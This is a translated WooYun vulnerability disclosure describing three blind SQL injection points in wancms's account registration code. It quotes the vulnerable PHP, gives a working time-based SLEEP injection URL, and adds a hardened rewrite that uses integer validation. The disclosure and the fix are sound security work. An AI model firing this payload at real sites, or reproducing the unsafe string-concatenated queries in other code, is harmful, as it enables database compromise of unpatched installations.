
Vulnerability summary

Defect ID: wooyun-2015-0143240

Title: wancms, three blind SQL injection points (of limited practical use)

Vendor: wancms.com

Author: 不能忍

Submitted: 2015-10-12 11:07

Fix deadline: 2016-01-15 11:09

Disclosed: 2016-01-15 11:09

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 11

Status: vendor notified, vendor ignored the vulnerability

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-10-12: details sent to the vendor, awaiting vendor handling
2015-10-17: vendor chose to ignore the vulnerability; details opened to third-party security partners (NSFOCUS, 唐朝安全巡航)
2015-12-11: details opened to core white hats and domain experts
2015-12-21: details opened to regular white hats
2015-12-31: details opened to intern white hats
2016-01-15: details opened to the public

Brief description:

Detailed description:

/app/Lib/Action/AccountsAction.class.php // line 118

public function username_check1() {
    unset ( $_SESSION ['uid'] );
    unset ( $_SESSION ['member'] );
    cookie ( 'auth', '1' );
    $html = uc_user_synlogout ();
    $callback = isset ( $_GET ['jsonpCallback'] ) ? $_GET ['jsonpCallback'] : 'jsonpCallback';
    $gid = htmlspecialchars($_GET['gid']); // not filtered for SQL at all
    // if sid/uid are missing, fetch the latest opened server; uid defaults to the platform's default promotion account
    $uid_1 = htmlspecialchars($_GET['uid']); // promotion id, used to look up its parent id // likewise not filtered
    $username = strtolower(trim(htmlspecialchars($_GET ['cn'])));
    $password = trim ( htmlspecialchars($_GET ['pwd']) );
    $domain = $this->getdomain($_SERVER['HTTP_HOST']);
    $email = $username.'@'.$domain;
    if (! preg_match ( "/^([a-zA-Z0-9]|[._]){5,22}$/", $username )) {
        $data = "{\"result\":\"err0003\"}";
        echo $callback . '(' . $data . ')';die();
    }
    if (strlen ( $password ) < 6 || strlen ( $password ) > 22 || $password == "") {
        $data = "{\"result\":\"err0006\"}";
        echo $callback . '(' . $data . ')';die();
    }
    // #### UC integration #####
    $uid = uc_user_register($username,$password,$email);
    $uid=321;
    if ($uid <= 0) {
        if ($uid == - 1) {
            $data = "{\"result\":\"err0001\"}";
            echo $callback . '(' . $data . ')';die();
        } elseif ($uid == - 2) {
            $data = "{\"result\":\"err0001\"}";
            echo $callback . '(' . $data . ')';die();
        } elseif ($uid == - 3) {
            $data = "{\"result\":\"err0003\"}";
            echo $callback . '(' . $data . ')';die();
        } elseif ($uid == - 4) {
            $data = "{\"result\":\"err0001\"}";
            echo $callback . '(' . $data . ')';die();
        } elseif ($uid == - 5) {
            $data = "{\"result\":\"err0001\"}";
            echo $callback . '(' . $data . ')';die();
        } elseif ($uid == - 6) {
            $data = "{\"result\":\"err0001\"}";
            echo $callback . '(' . $data . ')';die();
        } else {
            $data = "{\"result\":\"err0001\"}";
            echo $callback . '(' . $data . ')';die();
        }
    } else { // registration succeeded
        $userinfo ['username'] = $username;
        $userinfo ['nickname'] = $username;
        $userinfo ['email'] = $email;
        $userinfo ['point'] = "0";
        $userinfo ['id_card'] = '';
        $userinfo ['uid'] = $uid;
        $model = M ( 'member' );
        if ($model->add ($userinfo)) {

            $extend = M ( 'member_extend_info' );
            $extends_info ['uid'] = $uid;
            $extends_info ['register_time'] = time ();
            $extends_info ['register_ip'] = get_client_ip ();
            $extends_info ['lastlogin_time'] = time ();
            $extends_info ['lastlogin_ip'] = get_client_ip ();
            $extends_info ['realname'] = '';
            $extends_info ['from_soical'] = 'cps';
            $extends_info ['gid'] = $gid;
            $extends_info ['sid'] = htmlspecialchars($_GET['sid']);
            $smodel = M('server');

            if($extends_info ['sid']){
                $extends_info ['sid'] = htmlspecialchars($_GET['sid']); // not filtered either
            }else{
                $s_info= $smodel->where("status = '0' and gid = ".$gid)->order('add_time desc')->select();
                $extends_info ['sid'] =$s_info[0]['sid'];
            }

            // make sure sid and gid belong to the same game
            $s_info1= $smodel->where("sid = ".$extends_info ['sid'])->find(); // this is the third injection point
            if($s_info1['gid']!=$extends_info ['gid']){
                $s_info= $smodel->where("status = '0' and gid = ".$gid)->order('add_time desc')->select(); // this is the first injection point
                $extends_info ['sid'] =$s_info[0]['sid'];
            }

            $sid = $extends_info ['sid'];
            // the promotion link itself is a first-level guild link
            if($uid_1){
                $info = $extend->where (' grouping = 1 and uid ='.$uid_1)->find (); // this is the second injection point
                if (empty($info)) {
                    $extends_info ['sub_channels'] = '4';
                    $extends_info ['total_channels'] = '4';
                }else{
                    $extends_info ['sub_channels'] = $uid_1;
                    if($info['subsign']=='0'){
                        $extends_info ['total_channels'] = $uid_1;
                    }else{
                        $extends_info ['total_channels'] = $info['subsign'];
                    }
                }
            }else{
                $extends_info ['sub_channels'] = '4';
                $extends_info ['total_channels'] = '4';
            }
            $extend->add($extends_info);
            // set cookies
            setcookie ('auth', uc_authcode ( $uid . "\t" . $username, 'ENCODE' ), 0, C ( 'COOKIE_PATH' ), C ( 'COOKIE_DOMAIN' ), 0, false );
            setcookie ( 'name', $username, time () + 3600, "/" );
            /**
             * **********************************
             */
            // prevent registration from the local machine
            import ( "@.ORG.Getmacaddr" );
            $mac = new GetMacAddr ( PHP_OS );
            $ip = get_client_ip ();
            $macaddr = $mac->mac_addr;
            setcookie ( "gameplf_anti_csrf", md5 ( $macaddr ), time () + 3600 * 24, "/" );
            setcookie ( "login_check_ip", md5 ( $ip ), time () + 3600 * 24, "/" );

            $ucsynlogin = uc_user_synlogin ( $uid );
            $_SESSION ['uid'] = $uid;
            $_SESSION ['member'] = $username;
            $ucsynlogin =str_replace('"', "'", $ucsynlogin);
            $data="{\"result\":\"success\",\"gid\":\"$gid\",\"fid\":\"$sid\",\"login\":\"$ucsynlogin\"}";
            echo $callback . '(' . $data . ')';die();

        } else {
            $data = "{\"result\":\"err0001\"}";
            echo $callback . '(' . $data . ')';die();
        }

    }

}


None of these three places is filtered for SQL (htmlspecialchars only encodes HTML metacharacters, and the payload needs none). There is one obstacle, though: a username that has already been registered cannot be registered again,
so every injection request has to use a fresh username.
The page also returns nothing usable in the response body, so only blind (time-based) injection is possible.
Testing this realistically requires a script, which is why the bug is of limited practical use; the injection is nonetheless real.
Here is a payload to test it:
http://localhost/accounts/username_check1/?gid=1&cn=test1ees&pwd=111111&sid=0&uid=1) AND (SELECT * FROM (SELECT(SLEEP(6)))test) AND 'wooyun'='wooyun'%23
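A hardened version of the three query sites, added here as an example; it is not wancms's code and was not part of the original report. It assumes the same ThinkPHP 3 style `M()` model API the vulnerable function uses, where passing an array of conditions to `where()` makes the framework quote and escape each value instead of splicing a string (an assumption about the framework, stated here rather than verified against wancms). The helper `positive_int` and the wrapper `resolve_server_and_channel` are names introduced for this example.

```php
<?php
// Added example, not wancms code: the three where() calls from username_check1()
// rewritten so that user-controlled values never reach the SQL text unchecked.
// htmlspecialchars() encodes for HTML output; a payload that uses only digits,
// parentheses, spaces and a comment marker passes through it unchanged, so it
// provides no protection for a query built by string concatenation.

/**
 * Return a positive integer parsed from a raw request value, or null when the
 * value is absent or is not a plain decimal number. gid, sid and uid are all
 * numeric identifiers, so anything else is rejected before any query is built.
 */
function positive_int($raw) {
    if ($raw === null || is_array($raw)) {
        return null;
    }
    $s = trim((string) $raw);
    // ctype_digit accepts only 0-9: no sign, space, quote, parenthesis or '#'
    if ($s === '' || !ctype_digit($s)) {
        return null;
    }
    $n = (int) $s;
    return $n > 0 ? $n : null;
}

/**
 * Resolve the server (sid) and promotion channel fields for a new member.
 * Mirrors the original control flow, but every condition goes to ThinkPHP's
 * where() as an array (assumed to be quoted and escaped by the framework) and
 * only validated integers are used. Returns the partial $extends_info array,
 * or null when gid is invalid so the caller can answer with an error instead
 * of running any query.
 */
function resolve_server_and_channel($gid_raw, $sid_raw, $uid_raw) {
    $gid   = positive_int($gid_raw);
    $sid   = positive_int($sid_raw);   // null: client did not supply a usable sid
    $uid_1 = positive_int($uid_raw);   // null: no promotion id, use the default channel
    if ($gid === null) {
        return null;
    }

    $smodel = M('server');             // ThinkPHP 3 model factory (assumed, as in the original)
    $extend = M('member_extend_info');
    $out = array('gid' => $gid);

    // First point (originally "status = '0' and gid = ".$gid): array condition instead
    $latest = $smodel->where(array('status' => '0', 'gid' => $gid))
                     ->order('add_time desc')
                     ->select();
    $latest_sid = empty($latest) ? null : (int) $latest[0]['sid'];

    // Third point (originally "sid = ".$sid): look up the supplied sid, keep it only
    // if it belongs to the same game, otherwise fall back to the latest open server
    if ($sid !== null) {
        $s_info1 = $smodel->where(array('sid' => $sid))->find();
        $out['sid'] = ($s_info1 && (int) $s_info1['gid'] === $gid) ? $sid : $latest_sid;
    } else {
        $out['sid'] = $latest_sid;
    }

    // Second point (originally ' grouping = 1 and uid ='.$uid_1)
    $out['sub_channels']   = '4';
    $out['total_channels'] = '4';
    if ($uid_1 !== null) {
        $info = $extend->where(array('grouping' => 1, 'uid' => $uid_1))->find();
        if (!empty($info)) {
            $out['sub_channels']   = $uid_1;
            $out['total_channels'] = ($info['subsign'] == '0') ? $uid_1 : $info['subsign'];
        }
    }
    return $out;
}
```

With this in place the `uid=1) AND (SELECT ...` value from the payload above fails `ctype_digit` and never produces a query at all, and the remaining lookups receive integers bound through the framework rather than text spliced into the statement. The integer check is the primary control; the array form of `where()` is defence in depth so that a later change to one of these fields (say, a string sid) does not quietly reintroduce the concatenation.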

Proof of vulnerability:

[Screenshot: QQ截图20150924174205.jpg]

Fix suggestions:

Copyright notice: please credit 不能忍@乌云 when reposting


Vulnerability response

Vendor response:

Severity: no impact, vendor ignored

Ignored on: 2016-01-15 11:09

Vendor reply:

Vulnerability Rank: 4 (WooYun rating)

Latest status:

None

